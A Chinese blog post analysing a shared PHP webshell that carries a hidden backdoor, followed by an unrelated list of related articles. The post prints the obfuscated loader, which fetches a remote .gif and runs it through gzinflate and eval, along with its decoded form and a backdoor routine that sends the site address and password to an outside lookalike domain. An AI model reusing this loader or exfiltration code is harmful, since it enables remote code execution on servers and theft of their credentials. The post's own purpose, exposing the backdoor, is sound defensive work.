php图片大马加后门,一次对php大马的后门的简单分析
一次对php大马的后门的简单分析
有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次
$password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>
一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。
就是个简单的基于base64加gzinflate加密
还原一下:
$password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
session_start();
if(empty($_SESSION['PhpCode'])){
$url = "http://i.niupic.com/images/2017/05/21/v1QR1M.gif";
$get = "file_get_contents";
$_SESSION['PhpCode']=$get($url);}
$un = "gzinflate";
@eval($un($_SESSION['PhpCode']));
?>
现在马子的路数很清楚了 通过远程下载主力代码
到这儿我们还是没发现后门,通过wget下载v1QR1M.gif改后缀txt乱码(gzinflate压缩编码本该乱码)
后门部分:
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');
$url=$copyurl.$serveru.'&pass='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('');
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
在1416行
SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=通过解码得出后门地址HTTP://WWW.FACEB0OK.CC/error.php?name=
posted @ 2019-05-22 17:42 卿先生 阅读(...) 评论(...) 编辑 收藏
php图片大马加后门,一次对php大马的后门的简单分析相关推荐
- iTextSharp PDF .NET 设置图片大小为A4尺寸
Dim img As iTextSharp.text.Image = iTextSharp.text.Image.GetInstance(PictureBox1.Image, ImageFormat. ...
- 轮播图中间图片大,两边图片小
简单的轮播图效果中间大图,两边小图,旋转木马平滑轮播效果 中间图片大,两边图片小的效果 效果图 <!DOCTYPE html> <html><head><me ...
- 微信推出图片大爆炸功能;苹果自研 5G 芯片或已失败;微软解决导致 Edge 停止响应的 bug|极客头条...
「极客头条」-- 技术人员的新闻圈! CSDN 的读者朋友们早上好哇,「极客头条」来啦,快来看今天都有哪些值得我们技术人关注的重要新闻吧. 整理 | 梦依丹 出品 | CSDN(ID:CSDNnews ...
- 微信推出图片大爆炸功能;苹果自研 5G 芯片或已失败;微软解决导致 Edge 停止响应的 bug|极客头条
「极客头条」-- 技术人员的新闻圈! CSDN 的读者朋友们早上好哇,「极客头条」来啦,快来看今天都有哪些值得我们技术人关注的重要新闻吧. 整理 | 梦依丹 出品 | CSDN(ID:CSDNnews ...
- 网站管理员总是嫌弃我的图片大,怎么提供适合网页WEB的尺寸图片?
网站管理员总是嫌弃我的图片大,怎么提供适合网页WEB的尺寸图片?这有一招教你处理 首先你用Photoshop打开任意一张图片,不管它多大,您首先先调整他的尺寸大小,单位px,让宽度保持和你网页最大显示 ...
- Android文件夹占用空间分析,关于Android中图片大小、内存占用与drawable文件夹关系的研究与分析...
从上一篇文章<Android屏幕适配全攻略>写完之后,经常会有朋友问我这个问题:"能不能一个App只提供一套切图适应所有的分辨率呢?"我觉得有必要写一篇文章来研究一下这 ...
- python分割文件为小文件_Python实现将一个大文件按段落分隔为多个小文件的简单操作方法...
本文实例讲述了Python实现将一个大文件按段落分隔为多个小文件的简单操作方法.分享给大家供大家参考,具体如下: 今天帮同学处理一点语料.语料文件有点大,并且是以连续两个换行符作为段落标志,他想把它按 ...
- JPEG图片格式简单分析
JPEG文件格式简单分析 作者:小爽 摘要: 这篇文章大体上介绍了JPEG文件的结构信息以及它的压缩算法和编码方式.使读者能够对JPEG文件格式有大体上的了解.为读者进一步进行学习JPEG文件压缩做好 ...
- HTML期末大作业: 学生个人网页设计作品 学生个人网页模板 简单个人主页成品 个人网页制作 HTML学生个人网站作业设计代做...
1.临近期末, 你还在为HTML网页设计结课作业,老师的作业要求感到头大?HTML网页作业无从下手? 网页要求的总数量太多? 2.没有合适的模板?等等一系列问题.你想要解决的问题,在这篇博文中基本都能 ...
- HTML期末大作业: 学生个人网页设计作品 学生个人网页模板 简单个人主页成品 个人网页制作 HTML学生个人网站作业设计代做
HTML期末大作业: 学生个人网页设计作品 学生个人网页模板 简单个人主页成品 个人网页制作 HTML学生个人网站作业设计代做 1.临近期末, 你还在为HTML网页设计结课作业,老师的作业要求感到头大 ...
最新文章
- 详解Azure的权限控制
- jquery拓展插件开发
- php 循环从数据库分页取数据批量修改数据
- Linux下dislocate命令用法,在 Linux 中遨游手册页的海洋 | Linux 中国
- omitting directory `folder/'
- AUTOSAR从入门到精通100讲(十三)--autosar架构中的ARXML
- Struts1.2+Spring2.5+Hibernate3.2框架搭建(十三)
- Numpy的学习6-深浅赋值(copydeep copy)
- Jan 11 - Contains Duplicate II; Array; Traverse; HashMap; HashSet;
- ios 手势返回监听方法
- cmd命令查询电脑序列号_什么命令可以查电脑型号、序列号
- python3爬虫(1)爬取链家二手房
- 仨人一起生活的日子刚刚好,不是吗?
- (极值点偏移问题的几种方案)已知$\dfrac{\ln x_1}{x_1}=\dfrac{\ln x_2}{x_2}$,求证:$x_1+x_22\text{e}$....
- checkpoints are occurring too frequently
- BZOJ3755 : Pty爬山
- 再谈中国的收入不平等问题
- 降龙十八掌-程序员篇
- 离散数学数理逻辑部分【2】
- RPA机器人流程自动化(Robotic process automation)
热门文章
- iOS文本展开收起,使用YYKit展开全文和收起全文,支持图文混排
- shiro 框架实现 LDAP 登录
- highcharts 解决数据提示框展示的内容太多 ,部分内容无法显示的问题
- nodejs tinypng 压缩
- 软件dfmea_DFMEA与PFMEA之间不得不说的关系
- visual studio 2015 无法打开源文件“stdafx.h“
- Linux版MySQL下载教程
- macOS Python安装教程
- 数据结构——顺序表 SqList *L 和 SqList * L的区别
- 易语言短信接口_易语言短信接口_易语言发短信_易语言短信验证码_验证码短信代码示例_互亿无线...